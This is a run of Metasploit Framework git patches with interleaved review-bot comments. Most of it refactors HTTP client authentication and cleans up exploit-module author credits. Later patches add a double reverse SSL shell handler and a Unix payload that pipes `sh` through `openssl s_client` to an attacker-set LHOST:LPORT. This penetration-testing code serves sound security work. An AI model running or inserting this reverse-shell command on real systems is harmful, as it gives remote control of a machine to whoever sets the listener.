@@ -47,10 +48,6 @@ def initialize(info = {}) OptString.new('UserAgent', [false, 'The User-Agent header to use for all requests', Rex::Proto::Http::Client::DefaultUserAgent ]), - OptString.new('BasicAuthUser', [false, 'The HTTP username to specify for basic authentication']), - OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), - OptString.new('DigestAuthUser', [false, 'The HTTP username to specify for digest authentication']), - OptString.new('DigestAuthPassword', [false, 'The HTTP password to specify for digest authentication']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]), @@ -157,7 +154,9 @@ def connect(opts={}) }, dossl, ssl_version, - proxies + proxies, + datastore['USERNAME'], + datastore['PASSWORD'] ) # Configure the HTTP client with the supplied parameter @@ -185,7 +184,15 @@ def connect(opts={}) 'pad_post_params_count' => datastore['HTTP::pad_post_params_count'], 'uri_fake_end' => datastore['HTTP::uri_fake_end'], 'uri_fake_params_start' => datastore['HTTP::uri_fake_params_start'], - 'header_folding' => datastore['HTTP::header_folding'] + 'header_folding' => datastore['HTTP::header_folding'], + 'usentlm2_session' => datastore['NTLM::UseNTLM2_session'] + 'use_ntlmv2' => datastore['NTLM::UseNTLMv2'], + 'send_lm' => datastore['NTLM::SendLM'], + 'send_ntlm' => datastore['NTLM::SendNTLM'], + 'SendSPN' => datastore['NTLM::SendSPN'], + 'UseLMKey' => datastore['NTLM::UseLMKey'], + 'domain' => datastore['DOMAIN'], + 'DigestAuthIIS' => datastore['DigestAuthIIS'] ) # If this connection is global, persist it diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index ddc1d3b30e22..d544543d168f 100644 
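Review bot: The first line added to the client configuration in `connect`, `'usentlm2_session' => datastore['NTLM::UseNTLM2_session']`, has no trailing comma before `'use_ntlmv2' => ...`, so the file does not parse and the mixin cannot be loaded. Add the comma: `'usentlm2_session' => datastore['NTLM::UseNTLM2_session'],`.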
--- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -74,7 +74,11 @@ def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, prox 'send_ntlm' => true, 'SendSPN' => true, 'UseLMKey' => false, - 'domain' => 'WORKSTATION' + 'domain' => 'WORKSTATION', + # + # Digest Options + # + 'DigestAuthIIS' => true } # This is not used right now... @@ -429,7 +433,7 @@ def digest_auth(opts={}) method = opts['method'] path = opts['uri'] iis = true - if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) + if (opts['DigestAuthIIS'] == false or self.config['DigestAuthIIS']) iis = false end From 61969d575b8753626236e41580e1f7d6a26f6a6e Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Thu, 31 Jan 2013 14:44:06 -0600 Subject: [PATCH 234/421] remove mixin require, more datastore clenaup --- lib/msf/core/exploit/http/client.rb | 14 +++++++++++--- lib/msf/core/exploit/mixins.rb | 1 - lib/rex/proto/http/client.rb | 3 ++- 3 files changed, 13 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 8e8e05dadb4a..808646a8435b 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -38,8 +38,8 @@ def initialize(info = {}) Opt::RPORT(80), OptString.new('VHOST', [ false, "HTTP server virtual host" ]), Opt::Proxies, - OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication']), + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), ], self.class ) 
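Review bot: The rewritten condition in `digest_auth` lost its comparison: `self.config['DigestAuthIIS']` is truthy whenever the option is enabled, and the default added in this same commit is `true`, so `iis` is set to false in exactly the case where IIS-style quoting was requested. The `qop` value is then sent unquoted by default, which the comment in this method says some IIS versions reject. Keep the explicit test: `if (opts['DigestAuthIIS'] == false or self.config['DigestAuthIIS'] == false)`. `digest_auth` starts and ends outside this hunk.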
@@ -185,7 +185,7 @@ def connect(opts={}) 'uri_fake_end' => datastore['HTTP::uri_fake_end'], 'uri_fake_params_start' => datastore['HTTP::uri_fake_params_start'], 'header_folding' => datastore['HTTP::header_folding'], - 'usentlm2_session' => datastore['NTLM::UseNTLM2_session'] + 'usentlm2_session' => datastore['NTLM::UseNTLM2_session'], 'use_ntlmv2' => datastore['NTLM::UseNTLMv2'], 'send_lm' => datastore['NTLM::SendLM'], 'send_ntlm' => datastore['NTLM::SendNTLM'], @@ -281,6 +281,14 @@ def send_request_cgi(opts={}, timeout = 20) end end + # + # Combine the user/pass into an auth string for the HTTP Client + # + def basic_auth + return if not datastore['USERNAME'] + datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') + end + # # Authenticates to the remote host based on the most appropriate authentication method, # and returns the HTTP response. If there are multiple auth methods supported, then it diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 6e45892469bf..6b4db3a54ff6 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -37,7 +37,6 @@ require 'msf/core/exploit/tftp' require 'msf/core/exploit/telnet' require 'msf/core/exploit/ftpserver' -require 'msf/core/exploit/http/auth' require 'msf/core/exploit/http/client' require 'msf/core/exploit/http/server' require 'msf/core/exploit/smtp' diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index d544543d168f..50c354e688d4 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -366,8 +366,9 @@ def close def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? - send_auth(res, opts, t, persist) + res = send_auth(res, opts, t, persist) end + res end def _send_recv(req, t = -1, persist=false) From 6c12fa26bc2c7dc476f7df7bc745a814116e9552 Mon Sep 17 00:00:00 2001 
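Review bot: The guard in the new basic_auth, `return if not datastore['USERNAME']`, presumably can never fire once this commit gives USERNAME and PASSWORD a default of `''`: an empty string is truthy in Ruby, so with no credentials configured the method returns `":"` instead of nil. Testing `datastore['USERNAME'].to_s.empty?` matches the intent. The `|| ''` after `datastore['PASSWORD'].to_s` is dead code, because `to_s` never returns nil.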
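Review bot: `res = send_auth(res, opts, t, persist)` in send_recv refers to `opts`, which is neither a parameter nor a local of the method as shown (the signature is `send_recv(req, t = -1, persist=false)`), so the first 401 received with credentials set would raise NameError unless a method named `opts` exists elsewhere in the class. Derive it from the request before the call, for example `opts = req[:opts]`, which is the approach patch 235 below takes.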
From: David Maloney <DMaloney@rapid7.com> Date: Thu, 31 Jan 2013 16:49:52 -0600 Subject: [PATCH 235/421] oodles of small fixes Basic, NTLM and Negotiate auth all working transparently Have to test digest auth still --- lib/rex/proto/http/client.rb | 51 ++++++++++++++++++++++++------------ 1 file changed, 34 insertions(+), 17 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 50c354e688d4..267946f3399a 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -2,7 +2,11 @@ require 'rex/socket' require 'rex/proto/http' require 'rex/text' -require 'pry' +require 'digest' +require 'rex/proto/ntlm/crypt' +require 'rex/proto/ntlm/constants' +require 'rex/proto/ntlm/utils' +require 'rex/proto/ntlm/exceptions' module Rex module Proto @@ -244,7 +248,7 @@ def request_cgi(opts={}) c_host = opts['vhost'] || config['vhost'] c_conn = opts['connection'] c_path = opts['path_info'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' + uri = set_cgi(c_cgi) qstr = c_qs pstr = c_body @@ -301,10 +305,6 @@ def request_cgi(opts={}) req << set_host_header(c_host) req << set_agent_header(c_ag) - if (c_auth.length > 0) - req << set_basic_auth_header(c_auth) - end - req << set_cookie_header(c_cook) req << set_connection_header(c_conn) req << set_extra_headers(c_head) @@ -364,6 +364,8 @@ def close # to reuse an existing connection. # def send_recv(req, t = -1, persist=false) + opts = req[:opts] + req = req[:string] res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? res = send_auth(res, opts, t, persist) @@ -372,9 +374,10 @@ def send_recv(req, t = -1, persist=false) end def _send_recv(req, t = -1, persist=false) + if req.kind_of? Hash and req[:string] + req = req[:string] + end @pipeline = persist - opts = req[:opts] - req = req[:string] send_request(req, t) res = read_response(t) res.request = req.to_s if res 
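Review bot: send_recv now indexes its argument unconditionally with `opts = req[:opts]` and `req = req[:string]`, while _send_recv in the same commit unwraps only when `req.kind_of? Hash and req[:string]`. Callers are outside this diff, so this is an assumption to check, but if any of them still passes a request string rather than the hash, `req[:opts]` raises TypeError. Use one guard in both places, e.g. `opts = req.kind_of?(Hash) ? (req[:opts] || {}) : {}` and `req = req[:string] if req.kind_of?(Hash)`. That also keeps a nil `opts` from reaching send_auth, which dereferences `opts['headers']`.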
@@ -396,7 +399,12 @@ def have_creds? def send_auth(res, opts, t, persist) supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' - opts['basic_auth'] = self.username.to_s + ':' + self.password.to_s + if opts['headers'] + opts['headers']['Authorization'] = basic_auth_header(self.username,self.password) + else + opts['headers'] = { 'Authorization' => basic_auth_header(self.username,self.password)} + end + req = request_cgi(opts) res = _send_recv(req,t,persist) return res @@ -425,9 +433,16 @@ def send_auth(res, opts, t, persist) end end + def basic_auth_header(username,password) + auth_str = username.to_s + ":" + password.to_s + auth_str = "Basic " + Rex::Text.encode_base64(auth_str) + end + def digest_auth(opts={}) @nonce_count = 0 + to = opts['timeout'] || 20 + digest_user = opts['DigestAuthUser'] || "" digest_password = opts['DigestAuthPassword'] || "" @@ -448,7 +463,7 @@ def digest_auth(opts={}) r = request_cgi(opts.merge({ 'uri' => path, 'method' => method })) - resp = _send_recv(r, to) + resp = _send_recv(r, to, true) unless resp.kind_of? Rex::Proto::Http::Response return nil end @@ -545,7 +560,7 @@ def digest_auth(opts={}) 'uri' => path, 'method' => method, 'headers' => headers })) - resp = _send_recv(r, to) + resp = _send_recv(r, to, true) unless resp.kind_of? Rex::Proto::Http::Response return nil end @@ -565,6 +580,8 @@ def negotiate_auth(opts={}) :send_ntlm => self.config['send_ntlm'] } + to = opts['timeout'] || 20 + if opts['provider'] and opts['provider'].include? 'Negotiate' provider = "Negotiate " else 
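Review bot: The Basic branch of send_auth writes the Authorization header into the caller's `opts` hash, so the credential stays in that hash for any later request built from it. The four-line if/else can be the idiom negotiate_auth already uses: `opts['headers'] ||= {}` followed by `opts['headers']['Authorization'] = basic_auth_header(self.username, self.password)`, ideally applied to a copy of `opts` and of its headers hash. This path also answers any 401 that advertises Basic with the base64-encoded password whether or not the connection uses SSL; a comment stating that behaviour belongs above the branch. send_auth continues outside the hunk.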
@@ -574,12 +591,12 @@ def negotiate_auth(opts={}) opts['method']||= 'GET' opts['headers']||= {} - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + ntlmssp_flags = ::Rex::Proto::NTLM::Utils.make_ntlm_flags(ntlm_options) workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) domain_name = self.config['domain'] b64_blob = Rex::Text::encode_base64( - NTLM_UTILS::make_ntlmssp_blob_init( + ::Rex::Proto::NTLM::Utils::make_ntlmssp_blob_init( domain_name, workstation_name, ntlmssp_flags @@ -591,7 +608,7 @@ def negotiate_auth(opts={}) # First request to get the challenge opts['headers']['Authorization'] = ntlm_message_1 r = request_cgi(opts) - resp = _send_recv(r, to) + resp = _send_recv(r, to, true) unless resp.kind_of? Rex::Proto::Http::Response return nil end @@ -603,7 +620,7 @@ def negotiate_auth(opts={}) return resp unless ntlm_challenge ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + blob_data = ::Rex::Proto::NTLM::Utils.parse_ntlm_type_2_blob(ntlm_message_2) challenge_key = blob_data[:challenge_key] server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error @@ -615,7 +632,7 @@ def negotiate_auth(opts={}) spnopt = {:use_spn => self.config['SendSPN'], :name => self.hostname} - resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses( + resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = ::Rex::Proto::NTLM::Utils.create_lm_ntlm_responses( opts['username'], opts['password'], challenge_key, @@ -629,7 +646,7 @@ def negotiate_auth(opts={}) ntlm_options ) - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth( + ntlm_message_3 = ::Rex::Proto::NTLM::Utils.make_ntlmssp_blob_auth( domain_name, workstation_name, opts['username'], From 8d817dcbb5b652e8f26afa452a97f1190f27db99 Mon Sep 17 00:00:00 2001 
From: David Maloney <DMaloney@rapid7.com> Date: Fri, 1 Feb 2013 15:49:18 -0600 Subject: [PATCH 236/421] fix iis digest support mistake Digest auth working automatically --- lib/rex/proto/http/client.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 267946f3399a..8c32ed3c2baf 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -449,7 +449,7 @@ def digest_auth(opts={}) method = opts['method'] path = opts['uri'] iis = true - if (opts['DigestAuthIIS'] == false or self.config['DigestAuthIIS']) + if (opts['DigestAuthIIS'] == false or self.config['DigestAuthIIS'] == false) iis = false end From e8def29b4f810a1fd7d8ac6643bceddbc9bad991 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Fri, 1 Feb 2013 16:33:44 -0600 Subject: [PATCH 237/421] Dropping all twitter handles Also adds "pbot" as an accepted lowercase word. This will come up pretty routinley for functions and stuff. --- modules/exploits/multi/misc/pbot_exec.rb | 2 +- modules/exploits/windows/browser/adobe_cooltype_sing.rb | 3 +-- modules/exploits/windows/browser/ms10_090_ie_css_clip.rb | 2 +- modules/exploits/windows/fileformat/adobe_cooltype_sing.rb | 3 +-- tools/msftidy.rb | 3 ++- 5 files changed, 6 insertions(+), 7 deletions(-) diff --git a/modules/exploits/multi/misc/pbot_exec.rb b/modules/exploits/multi/misc/pbot_exec.rb index fb3f1693f98c..90ebfa34a7c5 100644 --- a/modules/exploits/multi/misc/pbot_exec.rb +++ b/modules/exploits/multi/misc/pbot_exec.rb @@ -28,7 +28,7 @@ def initialize(info = {}) [ 'evilcry', # pbot analysis' 'Jay Turla', # pbot analysis - '@bwallHatesTwits', # PoC + 'bwall', # aka @bwallHatesTwits, PoC 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/adobe_cooltype_sing.rb b/modules/exploits/windows/browser/adobe_cooltype_sing.rb index 0a64ebeae492..e51ecadf6dce 100644 
--- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb @@ -25,8 +25,7 @@ def initialize(info = {}) 'Author' => [ 'Unknown', # 0day found in the wild - '@sn0wfl0w', # initial analysis - '@vicheck', # initial analysis + 'sn0wfl0w', # initial analysis, also @vicheck on twitter 'jduck' # Metasploit module ], 'References' => diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb index cee5f962a616..a7ba46418a31 100644 --- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb @@ -49,7 +49,7 @@ def initialize(info = {}) 'Author' => [ 'unknown', # discovered in the wild - '@yuange1975', # PoC posted to twitter + 'Yuange', # PoC posted to twitter under @yuange1975 'Matteo Memelli', # exploit-db version 'jduck' # Metasploit module ], diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb index a8ba842b7e16..2e2ad87d3fa1 100644 --- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb @@ -25,8 +25,7 @@ def initialize(info = {}) 'Author' => [ 'Unknown', # 0day found in the wild - '@sn0wfl0w', # initial analysis - '@vicheck', # initial analysis + 'sn0wfl0w', # initial analysis, also @vicheck on twitter 'jduck' # Metasploit module ], 'References' => diff --git a/tools/msftidy.rb b/tools/msftidy.rb index aa63bea6a476..d2a17447f5fc 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -204,7 +204,7 @@ def check_badchars end if author_name =~ /^@.+$/ - error("No Twitter handle, please. Try leaving it in a comment instead.") + error("No Twitter handles, please. Try leaving it in a comment instead.") end if not author_name.ascii_only? 
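Review bot: The two Author entries `'@sn0wfl0w'` and `'@vicheck'` are collapsed into a single one, `'sn0wfl0w', # initial analysis, also @vicheck on twitter`, which reads as if both handles belong to one person and removes vicheck from the credited list. Unless they are known to be the same contributor, keep a separate entry such as `'vicheck', # initial analysis` and put only each entry's own handle in its comment. The identical change is made in modules/exploits/windows/fileformat/adobe_cooltype_sing.rb further down.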
@@ -281,6 +281,7 @@ def check_title_casing words.each do |word| if %w{and or the for to in of as with a an on at}.include?(word) next + elsif %w{pbot}.include?(word) elsif word =~ /^[a-z]+$/ warn("Improper capitalization in module title: '#{word}'") end From c3801ad08320fb53ad97d8e3f3682f958ffb2952 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 04:44:25 -0600 Subject: [PATCH 238/421] This adds an openssl CMD payload and handler --- .../core/handler/reverse_tcp_double_ssl.rb | 300 ++++++++++++++++++ .../singles/cmd/unix/reverse_openssl.rb | 58 ++++ 2 files changed, 358 insertions(+) create mode 100644 lib/msf/core/handler/reverse_tcp_double_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_openssl.rb diff --git a/lib/msf/core/handler/reverse_tcp_double_ssl.rb b/lib/msf/core/handler/reverse_tcp_double_ssl.rb new file mode 100644 index 000000000000..4410de7df77e --- /dev/null +++ b/lib/msf/core/handler/reverse_tcp_double_ssl.rb 
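Review bot: The added `elsif %w{pbot}.include?(word)` in check_title_casing has an empty body and works only because an empty branch ends the chain before `elsif word =~ /^[a-z]+$/`; a reader can easily take it for a missing line. Give the branch an explicit `next`, or keep the accepted lowercase names in one list beside the stop words with a comment such as `# lowercase proper names allowed in titles`. check_title_casing starts and ends outside the hunk.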
@@ -0,0 +1,300 @@ +# -*- coding: binary -*- +module Msf +module Handler + +### +# +# This module implements the reverse double TCP handler. This means +# that it listens on a port waiting for a two connections, one connection +# is treated as stdin, the other as stdout. +# +# This handler depends on having a local host and port to +# listen on. +# +### +module ReverseTcpDoubleSSL + + include Msf::Handler + + # + # Returns the string representation of the handler type, in this case + # 'reverse_tcp_double'. + # + def self.handler_type + return "reverse_tcp_double_ssl" + end + + # + # Returns the connection-described general handler type, in this case + # 'reverse'. + # + def self.general_handler_type + "reverse" + end + + # + # Initializes the reverse TCP handler and ads the options that are required + # for all reverse TCP payloads, like local host and local port. + # + def initialize(info = {}) + super + + register_options( + [ + Opt::LHOST, + Opt::LPORT(4444) + ], Msf::Handler::ReverseTcpDoubleSSL) + + register_advanced_options( + [ + OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]), + ], Msf::Handler::ReverseTcpDoubleSSL) + + self.conn_threads = [] + end + + # + # Starts the listener but does not actually attempt + # to accept a connection. Throws socket exceptions + # if it fails to start the listener. + # + def setup_handler + if datastore['Proxies'] and not datastore['ReverseAllowProxy'] + raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. 
Can be overriden by setting ReverseAllowProxy to true' + end + self.listener_sock = Rex::Socket::TcpServer.create( + # 'LocalHost' => datastore['LHOST'], + 'LocalPort' => datastore['LPORT'].to_i, + 'Comm' => comm, + 'SSL' => true, + 'Context' => + { + 'Msf' => framework, + 'MsfPayload' => self, + 'MsfExploit' => assoc_exploit + }) + end + + # + # Closes the listener socket if one was created. + # + def cleanup_handler + stop_handler + + # Kill any remaining handle_connection threads that might + # be hanging around + conn_threads.each { |thr| + thr.kill + } + end + + # + # Starts monitoring for an inbound connection. + # + def start_handler + self.listener_thread = framework.threads.spawn("ReverseTcpDoubleSSLHandlerListener", false) { + sock_inp = nil + sock_out = nil + + print_status("Started reverse double handler") + + begin + # Accept two client connection + begin + client_a = self.listener_sock.accept + print_status("Accepted the first client connection...") + + client_b = self.listener_sock.accept + print_status("Accepted the second client connection...") + + sock_inp, sock_out = detect_input_output(client_a, client_b) + + rescue + wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}") + return nil + end + + # Increment the has connection counter + self.pending_connections += 1 + + # Start a new thread and pass the client connection + # as the input and output pipe. Client's are expected + # to implement the Stream interface. + conn_threads << framework.threads.spawn("ReverseTcpDoubleSSLHandlerSession", false, sock_inp, sock_out) { | sock_inp_copy, sock_out_copy| + begin + chan = TcpReverseDoubleSSLSessionChannel.new(framework, sock_inp_copy, sock_out_copy) + handle_connection(chan.lsock) + rescue + elog("Exception raised from handle_connection: #{$!}\n\n#{$@.join("\n")}") + end + } + end while true + } + end + + # + # Accept two sockets and determine which one is the input and which + # is the output. 
This method assumes that these sockets pipe to a + # remote shell, it should overridden if this is not the case. + # + def detect_input_output(sock_a, sock_b) + + begin + + # Flush any pending socket data + sock_a.get_once if sock_a.has_read_data?(0.25) + sock_b.get_once if sock_b.has_read_data?(0.25) + + etag = Rex::Text.rand_text_alphanumeric(16) + echo = "echo #{etag};\n" + + print_status("Command: #{echo.strip}") + + print_status("Writing to socket A") + sock_a.put(echo) + + print_status("Writing to socket B") + sock_b.put(echo) + + print_status("Reading from sockets...") + + resp_a = '' + resp_b = '' + + if (sock_a.has_read_data?(1)) + print_status("Reading from socket A") + resp_a = sock_a.get_once + print_status("A: #{resp_a.inspect}") + end + + if (sock_b.has_read_data?(1)) + print_status("Reading from socket B") + resp_b = sock_b.get_once + print_status("B: #{resp_b.inspect}") + end + + print_status("Matching...") + if (resp_b.match(etag)) + print_status("A is input...") + return sock_a, sock_b + else + print_status("B is input...") + return sock_b, sock_a + end + + rescue ::Exception + print_status("Caught exception in detect_input_output: #{$!}") + end + + end + + # + # Stops monitoring for an inbound connection. + # + def stop_handler + # Terminate the listener thread + if (self.listener_thread and self.listener_thread.alive? == true) + self.listener_thread.kill + self.listener_thread = nil + end + + if (self.listener_sock) + self.listener_sock.close + self.listener_sock = nil + end + end + +protected + + attr_accessor :listener_sock # :nodoc: + attr_accessor :listener_thread # :nodoc: + attr_accessor :conn_threads # :nodoc: + + + module TcpReverseDoubleSSLChannelExt + attr_accessor :localinfo + attr_accessor :peerinfo + end + + ### + # + # This class wrappers the communication channel built over the two inbound + # connections, allowing input and output to be split across both. 
+ # + ### + class TcpReverseDoubleSSLSessionChannel + + include Rex::IO::StreamAbstraction + + def initialize(framework, inp, out) + @framework = framework + @sock_inp = inp + @sock_out = out + + initialize_abstraction + + self.lsock.extend(TcpReverseDoubleSSLChannelExt) + self.lsock.peerinfo = @sock_inp.getpeername[1,2].map{|x| x.to_s}.join(":") + self.lsock.localinfo = @sock_inp.getsockname[1,2].map{|x| x.to_s}.join(":") + + monitor_shell_stdout + end + + # + # Funnel data from the shell's stdout to +rsock+ + # + # +StreamAbstraction#monitor_rsock+ will deal with getting data from + # the client (user input). From there, it calls our write() below, + # funneling the data to the shell's stdin on the other side. + # + def monitor_shell_stdout + + # Start a thread to pipe data between stdin/stdout and the two sockets + @monitor_thread = @framework.threads.spawn("ReverseTcpDoubleSSLHandlerMonitor", false) { + begin + while true + # Handle data from the server and write to the client + if (@sock_out.has_read_data?(0.50)) + buf = @sock_out.get_once + break if buf.nil? + rsock.put(buf) + end + end + rescue ::Exception => e + ilog("ReverseTcpDoubleSSL monitor thread raised #{e.class}: #{e}") + end + + # Clean up the sockets... + begin + @sock_inp.close + @sock_out.close + rescue ::Exception + end + } + end + + def write(buf, opts={}) + @sock_inp.write(buf, opts) + end + + def read(length=0, opts={}) + @sock_out.read(length, opts) + end + + # + # Closes the stream abstraction and kills the monitor thread. + # + def close + @monitor_thread.kill if (@monitor_thread) + @monitor_thread = nil + + cleanup_abstraction + end + + end + + +end + +end +end diff --git a/modules/payloads/singles/cmd/unix/reverse_openssl.rb b/modules/payloads/singles/cmd/unix/reverse_openssl.rb new file mode 100644 index 000000000000..ab9c0c2a130f --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_openssl.rb 
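Review bot: detect_input_output rescues `::Exception`, prints a status line and falls through, so on any failure it returns the value of print_status rather than two sockets, and start_handler's `sock_inp, sock_out = detect_input_output(client_a, client_b)` goes on to spawn a session thread with nil sockets. Rescue `::StandardError => e`, close both accepted sockets and re-raise, or return nil and have the caller skip the pair. In start_handler the `return nil` inside the block passed to `framework.threads.spawn` is not a method return and would typically raise LocalJumpError; `break` is presumably what was meant. The doc comment on handler_type still says 'reverse_tcp_double' although the method returns "reverse_tcp_double_ssl".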
@@ -0,0 +1,58 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_double_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Double reverse TCP SSL (openssl)', + 'Description' => 'Creates an interactive shell through two inbound connections', + 'Author' => 'hdm', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpDoubleSSL, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'openssl', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + cmd = + "sh -c '(sleep #{3600+rand(1024)}|" + + "openssl s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}|" + + "while : ; do sh && break; done 2>&1|" + + "openssl s_client -quiet -connect #{datastore['LHOST']}:#{datastore['LPORT']}" + + " >/dev/null 2>&1 &)'" + return cmd + end + +end From ffb88baf4a25f1f13b6e1ccfc8a8343e6a375bea Mon Sep 17 00:00:00 2001 
From: RageLtMan <rageltman [at] sempervictus> Date: Sun, 3 Feb 2013 14:59:15 -0500 Subject: [PATCH 239/421] initial module import from SV rev_ssl branch --- lib/msf/core/handler/reverse_tcp_ssl.rb | 122 ++++++++++++++++++ lib/msf/core/module/platform.rb | 16 +++ modules/exploits/multi/handler.rb | 2 +- .../cmd/unix/reverse_bash_telnet_ssl.rb | 63 +++++++++ .../cmd/unix/reverse_openssl_double.rb | 68 ++++++++++ .../singles/cmd/unix/reverse_perl_ssl.rb | 63 +++++++++ .../singles/cmd/unix/reverse_php_ssl.rb | 61 +++++++++ .../singles/cmd/unix/reverse_python_ssl.rb | 79 ++++++++++++ .../singles/cmd/unix/reverse_ruby_ssl.rb | 49 +++++++ .../cmd/unix/reverse_ssl_double_telnet.rb | 67 ++++++++++ .../singles/python/shell_reverse_tcp_ssl.rb | 77 +++++++++++ .../singles/ruby/shell_reverse_tcp_ssl.rb | 52 ++++++++ 12 files changed, 718 insertions(+), 1 deletion(-) create mode 100644 lib/msf/core/handler/reverse_tcp_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_openssl_double.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_php_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_python_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb create mode 100644 modules/payloads/singles/python/shell_reverse_tcp_ssl.rb create mode 100644 modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb diff --git a/lib/msf/core/handler/reverse_tcp_ssl.rb b/lib/msf/core/handler/reverse_tcp_ssl.rb new file mode 100644 index 000000000000..60f827c7ab97 --- /dev/null +++ b/lib/msf/core/handler/reverse_tcp_ssl.rb 
@@ -0,0 +1,122 @@ +require 'rex/socket' +require 'thread' + +module Msf +module Handler + +### +# +# This module implements the reverse TCP handler. This means +# that it listens on a port waiting for a connection until +# either one is established or it is told to abort. +# +# This handler depends on having a local host and port to +# listen on. +# +### +module ReverseTcpSsl + + include Msf::Handler::ReverseTcp + + # + # Returns the string representation of the handler type, in this case + # 'reverse_tcp_ssl'. + # + def self.handler_type + return "reverse_tcp_ssl" + end + + # + # Returns the connection-described general handler type, in this case + # 'reverse'. + # + def self.general_handler_type + "reverse" + end + + # + # Initializes the reverse TCP SSL handler and adds the certificate option. + # + def initialize(info = {}) + super + register_advanced_options( + [ + OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']) + ], Msf::Handler::ReverseTcpSsl) + + end + + # + # Starts the listener but does not actually attempt + # to accept a connection. Throws socket exceptions + # if it fails to start the listener. + # + def setup_handler + if datastore['Proxies'] + raise RuntimeError, 